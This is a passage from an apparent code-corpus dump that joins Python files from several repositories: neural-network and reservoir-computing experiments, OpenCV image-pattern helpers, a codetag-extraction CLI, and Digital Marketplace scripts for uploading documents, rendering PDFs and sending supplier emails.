'recieve_reward_program',
'die_program',
'action_controller_program'
]
dendrite_function_arities = [
[dendrite_internal_states + signal_dimensionality + dimensions, 2+signal_dimensionality+dendrite_internal_states],
[dendrite_internal_states + signal_dimensionality + dimensions, 2+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + signal_dimensionality, 4+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + signal_dimensionality, 4+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + dimensions + dendrite_internal_states, 2+dendrite_internal_states], # Accept connection
[dimensions + dendrite_internal_states + dimensions + dendrite_internal_states, 1], # Break connection
[dimensions + dendrite_internal_states + 1, 2 + dendrite_internal_states], # recieve reward
[dimensions + dendrite_internal_states, 1+signal_dimensionality], # die
[dendrite_internal_states + dimensions, 3]
]
logger = Logger.Logger(os.path.join(os.path.dirname(__file__), "logfiles") + "\\log", config['logger_ignore_messages'], config['advanced_logging'])
genome_successor_count = 4
if not config['non_crossover_children']:
genome_successor_count = 2
all_function_arities = neuron_function_arities + dendrite_function_arities
genome = Genome(
homeobox_variants = hox_variant_count,
successor_count = genome_successor_count,
input_arities = all_function_arities,
counter = genome_counter,
internal_state_variables = neuron_internal_states,
names = neuron_function_order[:-1] + dendrite_function_order,
logger = logger,
genome_counter = genome_counter,
config = config)
genome.load(correct_genome)
problem = stupid_problem_test.StupidProblem()
def genome_to_init_data(genome):
neuron_init_data = {
'axon_birth_programs' : genome.function_chromosomes[0],
'signal_axon_programs' : genome.function_chromosomes[1],
'recieve_axon_signal_programs': genome.function_chromosomes[2],
'recieve_reward_programs': genome.function_chromosomes[3],
'move_programs': genome.function_chromosomes[4],
'die_programs': genome.function_chromosomes[5],
'neuron_birth_programs': genome.function_chromosomes[6],
'action_controller_programs': genome.function_chromosomes[7],
'hox_variant_selection_program': genome.hex_selector_genome.program,
'internal_state_variable_count': neuron_internal_states
}
axon_init_data = {
'recieve_signal_neuron_programs' : genome.function_chromosomes[8],
'recieve_signal_dendrite_programs' : genome.function_chromosomes[9],
'signal_dendrite_programs' : genome.function_chromosomes[10],
'signal_neuron_programs' : genome.function_chromosomes[11],
'accept_connection_programs' : genome.function_chromosomes[12],
'break_connection_programs' : genome.function_chromosomes[13],
'recieve_reward_programs' : genome.function_chromosomes[14],
'die_programs' : genome.function_chromosomes[15],
'action_controller_programs' : genome.function_chromosomes[16],
'internal_state_variable_count': dendrite_internal_states
}
return neuron_init_data, axon_init_data
neuron_init, axon_init = genome_to_init_data(genome)
engine = NeuronEngine(
input_arity = problem.input_arity,
output_arity = problem.output_arity,
grid_count = 6,
grid_size = 10,
actions_max = 120,
neuron_initialization_data = neuron_init,
axon_initialization_data = axon_init,
signal_arity = signal_dimensionality,
hox_variant_count = hox_variant_count,
instances_per_iteration = 50,
logger = logger,
genome_id = genome.id,
config_file = copydict(config)
)
engine.run(problem, 0)
``` |
{
"source": "jonoddram/CodetagCrawler",
"score": 2
} |
#### File: CodetagCrawler/CodetagCrawler/cli.py
```python
import os
from .metadata_handler import *
import click
from .comment_processing import *
from .csv import *
@click.group()
def cli():
pass
@click.command()
@click.option('--input', '-i', help='Path to input folder')
@click.option('--output', '-o', help='Path to new output file')
@click.option('--config', '-c', help='Path to config file', required=False, default=
os.path.join(os.path.dirname(__file__), 'config.yml'))
def process(input, output, config):
input = os.path.normpath(input)
output = os.path.normpath(output)
metadata = get_metadata(config)
comment_processor = CommentProcessor(metadata['CODETAGS'], metadata['IGNORE_DIRECTORIES'])
file_names = comment_processor.get_all_filenames(input)
filtered = comment_processor.filter_list_ending(file_names, '.py')
files_comments = comment_processor.extract_comments(input, filtered)
files_comments = comment_processor.filter_out_comment_starts_all(files_comments)
files_comments = comment_processor.filter_out_non_codetag_comments_all(files_comments, metadata['CODETAGS'])
write_csv(output, files_comments, metadata['CODETAG_TO_WORK_ITEM_TYPE'])
cli.add_command(process)
if __name__ == '__main__':
cli()
``` |
{
"source": "jonoddram/neural_network_imagin_experiments",
"score": 3
} |
#### File: neural_network_imagin_experiments/v.0.1.6(.1) code/NN.py
```python
from numba import jit, njit
import numpy as np
import random
import PIL.Image as Image
import timeit
# The following is based on <NAME>'s Machine Learning chapter about neural networks, particularly p. 98, although
# the matrix version is something I've tried to derive so it may be erroneous; look carefully through before use.
# 0.1.3: Added very basic adaptive adjustment of learning rate, only down
# 0.1.4: Images are now not thumbnails but just scaled.
# 0.1.4: Added "proper" gradient descent mode
# 0.1.4: Now remembers momentum across epochs.
# 0.1.4: Increased network size - hidden layer 1 doubled, hidden layer 2 octupled. - reverted
# 0.1.4: Hidden layer 1 and 2 node count halved
# 0.1.4: Also had a look at scipy for using sparse matrices. Seemed to have rather poor support of elementwise operations...
# 0.1.5: Turns out Pillow's resize function returns a resized image instead of resizing in place. This means the training data only
# saved the upper left corner of each image instead of the entire image, explaining why the network was unable to learn... as there was little to learn.
# 0.1.5.1: Reverted hidden network size to ImageSize.
# 0.1.6: Added individual learning rates to weights, removed gradient descent - REVERTED
# 0.1.6.1: Re-implemented global adaptive learning rate
Version = "0.1.6.2"
LearningRate = 0.1
ImageSize = 110
TargetEpochs = 1000000
output_path = "D:\\jonod\\Pictures\\BackpropExperiment\\Outputs" # path to output folder, also folder with training data in it.
mode = "Stochastic_Gradient_Descent" # only stochastic gradient descent is currently implemented
# Consider making a sparse matrix at some point to improve efficiency?
# Maybe a "reverse" convolutional neural network?
# Slightly misleading names, are actually weight matrices, consider refactoring
# Init layers
nodes_input = np.zeros((ImageSize, 8), np.float64) # weights from the 8 input nodes to the ImageSize nodes of hidden layer 1
nodes_hidden1 = np.zeros((ImageSize, ImageSize), np.float64) # weights from hidden layer 1 to the ImageSize nodes of hidden layer 2
nodes_hidden2 = np.zeros((ImageSize*ImageSize, ImageSize), np.float64) # weights from hidden layer 2 to the ImageSize*ImageSize output nodes (ImageSize x ImageSize black and white)
# This one does not work with @njit, the issue seems to be related to the dot product always returning the same value. The same happens when all values are not 0
def calculate_output(in1, in2, in3, in4, in5, in6, in7, in8):
#print(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64))
#print(sigmoid(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64)))
#print(np.dot(nodes_input, sigmoid(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64)))) # Error seems to be here, this always is 0? - Issue is with njit
#print(sigmoid(np.dot(nodes_input, sigmoid(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64)))))
hidden1_output = sigmoid(np.dot(nodes_input, sigmoid(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64)))) # 4 x 3 * 3 x 1 => 4 x 1
hidden2_output = sigmoid(np.dot(nodes_hidden1, hidden1_output)) # 3 x 4 * 4 x 1 => 3 x 1
output = sigmoid(np.dot(nodes_hidden2, hidden2_output)) # ImageSize*ImageSize*4 x 3 * 3 x 1 = ImageSize*ImageSize*4 x 1
return hidden1_output, hidden2_output, output
@njit
def calc_output_layer_error(network_output, training_value):
return np.multiply(np.multiply(network_output, (1-network_output)), np.subtract(training_value, network_output))
@njit
def calc_hidden_layer_error(hiddenOutput, hiddenWeights, outputError):
# Seems to return only the one same value
return np.multiply(np.multiply(hiddenOutput, np.subtract(np.ones(hiddenOutput.shape, np.float64), hiddenOutput)), np.dot(np.transpose(hiddenWeights), outputError))
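# The two helpers above implement the textbook backpropagation deltas in matrix form:
#   output layer: delta_o = o * (1 - o) * (t - o)
#   hidden layer: delta_h = h * (1 - h) * (W^T @ delta_o)
# where o and h are layer outputs, t is the target vector and W are the weights feeding the next layer.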
@njit
def sigmoid(a):
    return 1.0/(1.0 + np.power(np.e, -a)) # standard logistic sigmoid
@njit
def update(error, the_input, learning_rate, last_update):
# W/momentum, calculated as in Tom Mitchell book
return learning_rate * (error * np.transpose(the_input)) + learning_rate * last_update # I think the_input is just the output of the previous layer in terms of what matrix to input, but I haven't checked so may be error source
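# For a single weight the update above reduces to a momentum-style rule (cf. the Tom Mitchell book
# referenced in the comment), with the learning rate reused as the momentum coefficient:
#   delta_w(t) = LearningRate * error * input + LearningRate * delta_w(t-1)
# e.g. with LearningRate = 0.1, error = 0.5, input = 1.0 and a previous update of 0.2,
# the new update is 0.1*0.5*1.0 + 0.1*0.2 = 0.07.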
def save_image(outputValues, filepath):
img = Image.new('RGB', (ImageSize, ImageSize))
for x in range(0, ImageSize):
for y in range(0, ImageSize):
img.putpixel((x, y), (int(outputValues[(y + x * ImageSize)][0]*255.0),
int(float(outputValues[(y + x * ImageSize)][0]) * 255.0),
int(float(outputValues[(y + x * ImageSize)][0]) * 255.0)))
img.save(filepath)
# Used to test that input images are output correctly
def save_image_input_test(outputValues, filepath):
img = Image.new('RGB', (ImageSize, ImageSize))
for x in range(0, ImageSize):
for y in range(0, ImageSize):
img.putpixel((x, y), (int(float(outputValues[(y + x * ImageSize)]) * 255.0),
int(float(outputValues[(y + x * ImageSize)]) * 255.0),
int(float(outputValues[(y + x * ImageSize)]) * 255.0)))
img.save(filepath)
# Start benchmark timer
start_time = timeit.default_timer()
# Load in training examples:
# Correct output format r1 g1 b1 a1 r2 g2 b2 a2 ...
# training file will be: seed1|seed2|seed3|r1|g1|b1|a1|r2|...!
training_file = open(output_path + "\\" + Version + "_training.txt", 'r')
text = training_file.read()
training_file.close()
process_step_zero = text.split("!")
training_data = []
for y in range(len(process_step_zero)): # Potential optimization
training_data.append([x for x in process_step_zero[y].split("|")])
# Test that input is stored and shown properly
for y in training_data:
save_image_input_test(y[4:], output_path + "\\" + Version + y[0] + "_test.png",)
epoch = 0
endNext = False
#last_average_error = float("inf")
average_error = 0
# Do training:
if mode == "Stochastic_Gradient_Descent": # This may seem like unneseccary code duplication but putting the if statement outside of the loop is marginally more efficient computationally
last_nodes_input = np.zeros((ImageSize, 8), np.float64)
last_nodes_hidden1 = np.zeros((ImageSize, ImageSize), np.float64)
last_nodes_hidden2 = np.zeros((ImageSize * ImageSize, ImageSize), np.float64)
while True:
average_error = 0
random.shuffle(training_data) # Randomize order of training data
for num in range(0, len(training_data)):
imageName = training_data[num][0] # Used only for filenames
in1, in2, in3, in4, in5, in6, in7, in8 = float(training_data[num][1]), float(training_data[num][2]), \
float(training_data[num][3]), float(training_data[num][4]), \
float(training_data[num][5]), float(training_data[num][6]), \
float(training_data[num][7]), float(training_data[num][8]),
target_output = np.asarray(training_data[num][9:],
np.float64) # Potential errors: Wrong indexing, wrong matrix format, strings not floats
target_output.shape = (ImageSize * ImageSize, 1)
hidden1_output, hidden2_output, output = calculate_output(in1, in2, in3, in4, in5, in6, in7, in8)
output_error = calc_output_layer_error(output, target_output)
hidden2_error = calc_hidden_layer_error(hidden2_output, nodes_hidden2, output_error)
hidden1_error = calc_hidden_layer_error(hidden1_output, nodes_hidden1, hidden2_error)
average_error += sum(np.power(np.subtract(output, target_output), 2)) * 1 / 2
update_nodes_input = update(hidden1_error, np.asarray([in1, in2, in3, in4, in5, in6, in7, in8], np.float64),
LearningRate, last_nodes_input)
update_nodes_hidden1 = update(hidden2_error, hidden1_output, LearningRate, last_nodes_hidden1)
update_nodes_hidden2 = update(output_error, hidden2_output, LearningRate, last_nodes_hidden2)
nodes_input = nodes_input + update_nodes_input
nodes_hidden1 = nodes_hidden1 + update_nodes_hidden1
nodes_hidden2 = nodes_hidden2 + update_nodes_hidden2
# Momentum
last_nodes_input = update_nodes_input
last_nodes_hidden1 = update_nodes_hidden1
last_nodes_hidden2 = update_nodes_hidden2
if endNext:
save_image(output,
output_path + "\\" + Version + "_Filename_" + imageName + "_Epoch_" + str(epoch) + ".png")
if epoch % 100 == 0:
#if average_error > last_average_error:
# LearningRate *= 0.5
#last_average_error = average_error
print(epoch, average_error / len(training_data))
epoch += 1
if endNext:
for num in range(0,
2): # This feels super dumb but it is the first and best solution I thought of so it'll do for prototyping
for num2 in range(0, 2):
for num3 in range(0, 2):
for num4 in range(0, 2):
for num5 in range(0, 2):
for num6 in range(0, 2):
for num7 in range(0, 2):
for num8 in range(0,
2): # Generate every possible permutation of the eight inputs
hidden1_output, hidden2_output, output = calculate_output(num, num2, num3,
num4, num5, num6,
num7, num8)
save_image(output, output_path + "\\" + Version + "_Output_" + str(num)
+ str(num2) + str(num3) + str(num4) +
str(num5) + str(num6) + str(num7) + str(num8) + ".png")
break
else:
endNext = average_error / len(training_data) < 1 or epoch > TargetEpochs
``` |
{
"source": "jonoddram/Patterner",
"score": 3
} |
#### File: jonoddram/Patterner/functions.py
```python
import cv2
import math
import numpy as np
# rotate function open source from internet
def rotate(image, theta):
"""
Rotates image
:param image: image to rotate
:param theta: degrees to rotate
:return: rotated image
"""
(h, w) = image.shape[:2]
center = (w / 2, h / 2)
M = cv2.getRotationMatrix2D(center, theta, 1)
    rotated = cv2.warpAffine(image, M, (int(w), int(h)), flags=cv2.INTER_LINEAR,
borderMode=cv2.BORDER_CONSTANT, borderValue=(255, 255, 255))
return rotated
def crop_transform(image, pattern, center_xy):
"""
Crops pattern such that it fits in image
:param image: image to paint on
:param pattern: pattern to paint
:param center_xy: the xy coords on image where the center of pattern should be placed
:return: cropped pattern, left, right, top, bot in img viewport
"""
img_dim_x, img_dim_y, _ = image.shape
pat_dim_x, pat_dim_y, _ = pattern.shape
(x, y) = center_xy
pat_left_imgviewport = int(math.floor(x - pat_dim_x/2))
pat_right_imgviewport = int(math.ceil(x + pat_dim_x/2))
pat_top_imgviewport = int(math.floor(y - pat_dim_y/2))
pat_bot_imgviewport = int(math.ceil(y + pat_dim_y/2))
cropleft = -pat_left_imgviewport if pat_left_imgviewport < 0 else 0
if pat_right_imgviewport > img_dim_x:
cropright = pat_dim_x - (pat_right_imgviewport - img_dim_x)
else:
cropright = pat_right_imgviewport
croptop = -pat_top_imgviewport if pat_top_imgviewport < 0 else 0
if pat_bot_imgviewport > img_dim_y:
cropbot = pat_dim_y - (pat_bot_imgviewport - img_dim_y)
else:
cropbot = pat_bot_imgviewport
modified_pattern = pattern[cropleft:cropright, croptop:cropbot]
pat_left_imgviewport = max(pat_left_imgviewport, 0)
pat_top_imgviewport = max(pat_top_imgviewport, 0)
pat_bot_imgviewport = min(pat_bot_imgviewport, img_dim_y)
pat_right_imgviewport = min(pat_right_imgviewport, img_dim_x)
return modified_pattern, pat_left_imgviewport, pat_right_imgviewport, pat_top_imgviewport, pat_bot_imgviewport
def init_img(x, y):
return np.zeros((x, y, 3))
def paint_pattern(image, pattern, center_xy, alpha):
"""
paints a pattern on an image, crops pattern if out of bounds
:param image: image to paint on
:param pattern: pattern to paint
:param center_xy: the xy coords on image where the center of pattern should be placed
:param alpha: Strength of pattern that is painted (in transparency)
:return: image with pattern painted on it
"""
img_dim_x, img_dim_y, _ = image.shape
pat_dim_x, pat_dim_y, _ = pattern.shape
(x, y) = center_xy
pat_left_imgviewport = int(math.floor(x - pat_dim_x / 2))
pat_right_imgviewport = int(math.ceil(x + pat_dim_x / 2))
pat_top_imgviewport = int(math.floor(y - pat_dim_y / 2))
pat_bot_imgviewport = int(math.ceil(y + pat_dim_y / 2))
image[pat_left_imgviewport:pat_right_imgviewport, pat_top_imgviewport:pat_bot_imgviewport] += pattern * alpha
return image, (pat_left_imgviewport, pat_top_imgviewport), (pat_right_imgviewport, pat_bot_imgviewport)
def linalg_solve_img(target_image, pattern_positions, patterns, pad, x_max, y_max):
target_image = target_image.flatten()
#target_image = target_image.reshape((target_image.shape[0], 1))
def _p(x):
return (x[0]+pad, x[1]+pad)
_patterns = []
for pos in pattern_positions:
pos = _p(pos)
for pat in patterns:
_patterns.append(paint_pattern(init_img(x_max+pad*2, y_max+pad*2), pat, pos, 1.0)[0]
[pad:x_max+pad,pad:y_max+pad].flatten())
patterns = np.asarray(_patterns).transpose()
activations = np.linalg.lstsq(patterns, target_image)[0]
produced_image = patterns @ activations
produced_image = produced_image.reshape((x_max, y_max, 3)).astype(int)
return produced_image
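# Sketch of the formulation above: each (position, pattern) pair is rendered onto a blank canvas,
# flattened, and stacked as one column of a matrix A, so with k positions and p patterns A has k*p
# columns; numpy.linalg.lstsq then solves A @ activations ~= target_image in the least-squares
# sense, and A @ activations reshaped to (x_max, y_max, 3) is the reconstructed image.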
``` |
{
"source": "jonoddram/Reservoir-computing-image-manipulation",
"score": 2
} |
#### File: jonoddram/Reservoir-computing-image-manipulation/echo_reservoir.py
```python
import numpy
import scipy.sparse
class echo_reservoir:
def __init__(self, adjacency_matrix, input_producer, output_consumer, matrix_width, matrix_height, chaos_factor):
self.adjacency_matrix = adjacency_matrix
self.input_producer = input_producer
self.output_consumer = output_consumer
self.timestep = 0
self.matrix_width = matrix_width
self.matrix_height = matrix_height
self.node_values = numpy.zeros([matrix_width * matrix_height], dtype=float)
self.chaos_factor = chaos_factor
def do_timestep(self):
        update = scipy.sparse.csr_matrix.dot(self.adjacency_matrix, self.node_values) # removing division causes overflow in line 19 - not sure how but node values greater than 1 seem to be carried over from previous iterations?
check = update >= 1.0
if True in check:
update = (update - min(update)) / (
max(update) - min(update)) # map to range [0, 1], prevents overflow
self.node_values = self.input_producer(self.timestep) + self.chaos_factor*update*(1-update) # logistic function w/ chaos valued parameter
check = self.node_values >= 1.0
if True in check:
self.node_values = (self.node_values-min(self.node_values))/(max(self.node_values) - min(self.node_values)) # map to range [0, 1], prevents overflow
self.output_consumer(self.node_values)
self.timestep += 1
def do_timestep_old(self):
# The version of do timestep that seemed to do edge-detection and such
        update = scipy.sparse.csr_matrix.dot(self.adjacency_matrix,
                                             self.node_values)/(self.matrix_height*self.matrix_width) # removing division causes overflow in line 19 - not sure how but node values greater than 1 seem to be carried over from previous iterations?
self.node_values = self.input_producer(self.timestep) + self.chaos_factor * update * (
1 - update) # logistic function w/ chaos valued parameter
check = self.node_values >= 1.0
if True in check:
self.node_values = (self.node_values - min(self.node_values)) / (
max(self.node_values) - min(self.node_values)) # map to range [0, 1], prevents overflow
self.output_consumer(self.node_values)
self.timestep += 1
def run(self, timesteps):
for num in range(self.timestep, timesteps):
self.do_timestep()
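# A minimal usage sketch (hypothetical sizes and callbacks, not part of the original project):
#   import numpy, scipy.sparse
#   w = h = 4
#   adjacency = scipy.sparse.random(w * h, w * h, density=0.1, format='csr')
#   producer = lambda t: numpy.zeros(w * h)              # no external drive
#   consumer = lambda values: print(values.mean())       # observe mean activation
#   reservoir = echo_reservoir(adjacency, producer, consumer, w, h, chaos_factor=3.7)
#   reservoir.run(10)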
``` |
{
"source": "jonodrew/digitalmarketplace-scripts",
"score": 2
} |
#### File: digitalmarketplace-scripts/dmscripts/bulk_upload_documents.py
```python
import os
import re
import csv
from dmutils.documents import get_document_path, generate_download_filename
def upload_file(bucket, dry_run, file_path, framework_slug, bucket_category,
document_category=None, document_type=None, supplier_name_dict=None):
supplier_id = get_supplier_id_from_framework_file_path(file_path)
if document_category is None:
document_name = get_document_name_from_file_path(file_path)
else:
document_name = '{0}.{1}'.format(document_category, document_type)
if 'signed-framework-agreement' in document_name:
print('Signed and countersigned agreement paths now need to be stored in database so can no longer be uploaded '
'using this script.')
return
upload_path = get_document_path(framework_slug, supplier_id, bucket_category,
document_name)
if supplier_name_dict is None:
download_filename = None
else:
supplier_name = supplier_name_dict[supplier_id]
download_filename = generate_download_filename(
supplier_id, document_name, supplier_name)
if not dry_run:
with open(file_path, 'rb') as source_file:
bucket.save(upload_path, source_file, acl='bucket-owner-full-control', download_filename=download_filename)
print(supplier_id)
else:
print("[Dry-run] UPLOAD: '{}' to '{}'".format(file_path, upload_path))
def get_bucket_name(stage, bucket_category):
bucket_name = 'digitalmarketplace-{0}-{1}-{1}'.format(bucket_category, stage)
print("BUCKET: {}".format(bucket_name))
return bucket_name
def get_all_files_of_type(local_directory, file_type):
for root, subfolder, files in os.walk(local_directory):
for filename in files:
if filename.endswith(file_type):
yield os.path.join(root, filename)
def get_supplier_id_from_framework_file_path(path):
match = re.search(r'(?:/|-)(\d{5,6})[-_]', path)
if not match:
raise ValueError("Could not find supplier ID in path {}".format(path))
return match.group(1)
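# Examples of paths the pattern above accepts (hypothetical file names):
#   'frameworks/g-cloud-9/123456-result-letter.pdf' -> '123456'
#   'agreements/12345_signed-agreement.pdf'         -> '12345'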
def get_document_name_from_file_path(path):
match = re.search(r'/\d{5,6}-(.*)', path)
return match.group(1)
def get_supplier_name_dict_from_tsv(tsv_path):
suppliers_name_dict = {}
with open(tsv_path, 'r') as tsvfile:
tsv_reader = csv.reader(tsvfile, delimiter='\t')
for row in tsv_reader:
suppliers_name_dict[row[0]] = row[1]
return suppliers_name_dict
```
#### File: digitalmarketplace-scripts/dmscripts/generate_framework_agreement_signature_pages.py
```python
import os
import io
import shutil
import re
import subprocess
from datetime import datetime
from dmscripts.helpers.html_helpers import render_html
from dmscripts.helpers import logging_helpers
from dmscripts.helpers.logging_helpers import logging
logger = logging_helpers.configure_logger({'dmapiclient.base': logging.WARNING})
def save_page(html, supplier_id, output_dir, descriptive_filename_part):
if not os.path.exists(output_dir):
os.mkdir(output_dir)
page_path = os.path.join(output_dir, '{}-{}.html'.format(supplier_id, descriptive_filename_part))
with io.open(page_path, 'w+', encoding='UTF-8') as htmlfile:
htmlfile.write(html)
def render_html_for_successful_suppliers(rows, framework, template_dir, output_dir):
template_path = os.path.join(template_dir, 'framework-agreement-signature-page.html')
template_css_path = os.path.join(template_dir, 'framework-agreement-signature-page.css')
for data in rows:
if data['pass_fail'] in ('fail', 'discretionary'):
continue
data['framework'] = framework
data['awardedLots'] = [lot for lot in framework['frameworkAgreementDetails']['lotOrder'] if int(data[lot]) > 0]
data['includeCountersignature'] = False
html = render_html(template_path, data)
save_page(html, data['supplier_id'], output_dir, "signature-page")
shutil.copyfile(template_css_path, os.path.join(output_dir, 'framework-agreement-signature-page.css'))
def render_html_for_suppliers_awaiting_countersignature(rows, framework, template_dir, output_dir):
template_path = os.path.join(template_dir, 'framework-agreement-signature-page.html')
template_css_path = os.path.join(template_dir, 'framework-agreement-signature-page.css')
template_countersignature_path = os.path.join(template_dir, 'framework-agreement-countersignature.png')
for data in rows:
if data['pass_fail'] == 'fail' or data['countersigned_path'] or not data['countersigned_at']:
logger.info("SKIPPING {}: pass_fail={} countersigned_at={} countersigned_path={}".format(
data['supplier_id'],
data['pass_fail'],
data['countersigned_at'],
data['countersigned_path'])
)
continue
data['framework'] = framework
data['awardedLots'] = [lot for lot in framework['frameworkAgreementDetails']['lotOrder'] if int(data[lot]) > 0]
data['countersigned_at'] = datetime.strptime(
data['countersigned_at'], '%Y-%m-%dT%H:%M:%S.%fZ'
).strftime('%d %B %Y')
data['includeCountersignature'] = True
html = render_html(template_path, data)
save_page(html, data['supplier_id'], output_dir, "agreement-countersignature")
shutil.copyfile(template_css_path, os.path.join(output_dir, 'framework-agreement-signature-page.css'))
shutil.copyfile(
template_countersignature_path,
os.path.join(output_dir, 'framework-agreement-countersignature.png')
)
def render_pdf_for_each_html_page(html_pages, html_dir, pdf_dir):
html_dir = os.path.abspath(html_dir)
pdf_dir = os.path.abspath(pdf_dir)
ok = True
if not os.path.exists(pdf_dir):
os.mkdir(pdf_dir)
for index, html_page in enumerate(html_pages):
html_path = os.path.join(html_dir, html_page)
pdf_path = '{}'.format(re.sub(r'\.html$', '.pdf', html_path))
pdf_path = '{}'.format(re.sub(html_dir, pdf_dir, pdf_path))
exit_code = subprocess.call(['wkhtmltopdf', 'file://{}'.format(html_path), pdf_path])
if exit_code > 0:
logger.error("ERROR {} on {}".format(exit_code, html_page))
ok = False
return ok
```
#### File: dmscripts/helpers/user_helpers.py
```python
import random
def get_supplier_id(api_client, framework, lot):
services = [
s for s in api_client.find_services(framework=framework, lot=lot)['services']
if s['status'] in ['published']
]
if not services:
raise RuntimeError(
"No live services found for '{}' framework{}".format(
framework,
" and '{}' lot".format(lot) if lot else "",
)
)
return random.choice(services)['supplierId']
def get_random_buyer_with_brief(api_client, framework, lot):
briefs = api_client.find_briefs(
framework=framework,
lot=lot,
status="live,cancelled,unsuccessful,closed,awarded",
with_users=True,
)["briefs"]
if not briefs:
raise RuntimeError(
"No users with published briefs found for '{}' framework{}".format(
framework,
" and '{}' lot".format(lot) if lot else "",
)
)
brief = random.choice(briefs)
return random.choice(brief["users"])
def get_random_user(api_client, role, supplier_id=None):
return random.choice([
u for u in api_client.find_users(role=role, supplier_id=supplier_id)['users']
if u['active'] and not u['locked']
])
```
#### File: digitalmarketplace-scripts/dmscripts/send_dos_opportunities_email.py
```python
from datetime import datetime, date, timedelta
from dmscripts.helpers.html_helpers import render_html
from dmscripts.helpers import logging_helpers
from dmscripts.helpers.logging_helpers import logging
from dmutils.formats import DATETIME_FORMAT, DISPLAY_DATE_FORMAT
logger = logging_helpers.configure_logger({'dmapiclient': logging.INFO})
def get_live_briefs_between_two_dates(data_api_client, lot_slug, start_date, end_date, framework_slug):
"""Get all briefs for a lot which were published between 2 dates."""
return [
brief for brief in data_api_client.find_briefs_iter(
status="live", lot=lot_slug, human=True, framework=framework_slug
)
if datetime.strptime(brief['publishedAt'], DATETIME_FORMAT).date() >= start_date
and datetime.strptime(brief['publishedAt'], DATETIME_FORMAT).date() <= end_date
]
def get_campaign_data(lot_name, list_id, framework_name):
return {
"type": "regular",
"recipients": {
"list_id": list_id,
},
"settings": {
"subject_line": "New opportunities for {0}: {1}".format(
lot_name, framework_name
),
"title": "DOS Suppliers: {0} [{1}]".format(lot_name, datetime.now().strftime("%d %B")),
"from_name": "Digital Marketplace Team",
"reply_to": "<EMAIL>",
"use_conversation": False,
"authenticate": True,
"auto_footer": False,
"inline_css": False,
"auto_tweet": False,
"fb_comments": False
},
"tracking": {
"opens": True,
"html_clicks": True,
"text_clicks": False,
"goal_tracking": False,
"ecomm360": False
}
}
def get_html_content(briefs, number_of_days):
start_date = date.today() - timedelta(days=number_of_days)
for brief in briefs:
brief.update(
{"applicationsClosedAtDateTime": datetime.strptime(brief["applicationsClosedAt"], DATETIME_FORMAT)}
)
html_content = render_html("templates/email/dos_opportunities.html", data={
"briefs": briefs,
"today": datetime.today(),
"display_date_format": DISPLAY_DATE_FORMAT,
"number_of_days": number_of_days,
"start_date": start_date
})
return {"html": html_content}
def main(data_api_client, mailchimp_client, lot_data, number_of_days, framework_slug):
logger.info(
"Begin process to send DOS notification emails for '{0}' lot".format(lot_data["lot_slug"]),
extra={"lot_data": lot_data, "number_of_days": number_of_days}
)
start_date = date.today() - timedelta(days=number_of_days)
end_date = date.today() - timedelta(days=1)
live_briefs = get_live_briefs_between_two_dates(
data_api_client, lot_data["lot_slug"], start_date, end_date, framework_slug
)
if not live_briefs:
logger.info(
"No new briefs found for '{0}' lot".format(lot_data["lot_slug"]),
extra={"number_of_days": number_of_days}
)
return True
logger.info(
"{0} new briefs found for '{1}' lot".format(len(live_briefs), lot_data["lot_slug"])
)
campaign_data = get_campaign_data(lot_data["lot_name"], lot_data["list_id"], live_briefs[0]['frameworkName'])
logger.info(
"Creating campaign for '{0}' lot".format(lot_data["lot_slug"])
)
campaign_id = mailchimp_client.create_campaign(campaign_data)
if not campaign_id:
return False
content_data = get_html_content(live_briefs, number_of_days)
logger.info(
"Setting campaign data for '{0}' lot and '{1}' campaign id".format(lot_data["lot_slug"], campaign_id)
)
if not mailchimp_client.set_campaign_content(campaign_id, content_data):
return False
logger.info(
"Sending campaign for '{0}' lot and '{1}' campaign id".format(lot_data["lot_slug"], campaign_id)
)
if not mailchimp_client.send_campaign(campaign_id):
return False
return True
```
#### File: digitalmarketplace-scripts/scripts/export-dos-specialists.py
```python
import sys
sys.path.insert(0, '.')
from docopt import docopt
from dmscripts.helpers.csv_helpers import make_fields_from_content_questions, write_csv_with_make_row
from dmscripts.helpers.auth_helpers import get_auth_token
from dmscripts.helpers.framework_helpers import find_suppliers_with_details_and_draft_services
from dmapiclient import DataAPIClient
from dmcontent.content_loader import ContentLoader
from dmscripts.helpers import logging_helpers
from dmscripts.helpers.logging_helpers import logging
from dmutils.env_helpers import get_api_endpoint_from_stage
logger = logging_helpers.configure_logger({"dmapiclient": logging.WARNING})
def find_all_specialists(client):
return find_suppliers_with_details_and_draft_services(client,
FRAMEWORK_SLUG,
lot="digital-specialists",
statuses="submitted"
)
def make_row(content_manifest):
section = content_manifest.get_section("individual-specialist-roles")
specialist_roles = list(get_specialist_roles(section))
def inner(record):
row = [
("supplier_id", record["supplier_id"]),
("supplier_name", record['supplier']['name']),
("supplier_declaration_name", record['declaration'].get('supplierRegisteredName', '')),
("status", "PASSED" if record["onFramework"] else "FAILED"),
]
return row + make_fields_from_content_questions(specialist_roles, record)
return inner
def get_specialist_roles(section):
return [
question
for outer_question in section.questions
for question in outer_question.questions
]
if __name__ == '__main__':
arguments = docopt(__doc__)
STAGE = arguments['<stage>']
CONTENT_PATH = arguments['<content_path>']
FRAMEWORK_SLUG = arguments['<framework_slug>']
client = DataAPIClient(get_api_endpoint_from_stage(STAGE), get_auth_token('api', STAGE))
content_loader = ContentLoader(CONTENT_PATH)
content_loader.load_manifest(FRAMEWORK_SLUG, "services", "edit_submission")
content_manifest = content_loader.get_manifest(FRAMEWORK_SLUG, "edit_submission")
suppliers = find_all_specialists(client)
write_csv_with_make_row(
suppliers,
make_row(content_manifest),
"output/{}-specialists.csv".format(FRAMEWORK_SLUG)
)
```
#### File: digitalmarketplace-scripts/scripts/snapshot-framework-stats.py
```python
from docopt import docopt
import logging
import sys
import dmapiclient
from dmapiclient.audit import AuditTypes
sys.path.insert(0, '.')
from dmscripts.helpers.auth_helpers import get_auth_token
from dmutils.env_helpers import get_api_endpoint_from_stage
logger = logging.getLogger('script')
logging.basicConfig(level=logging.INFO)
def get_stats(data_client, framework_slug):
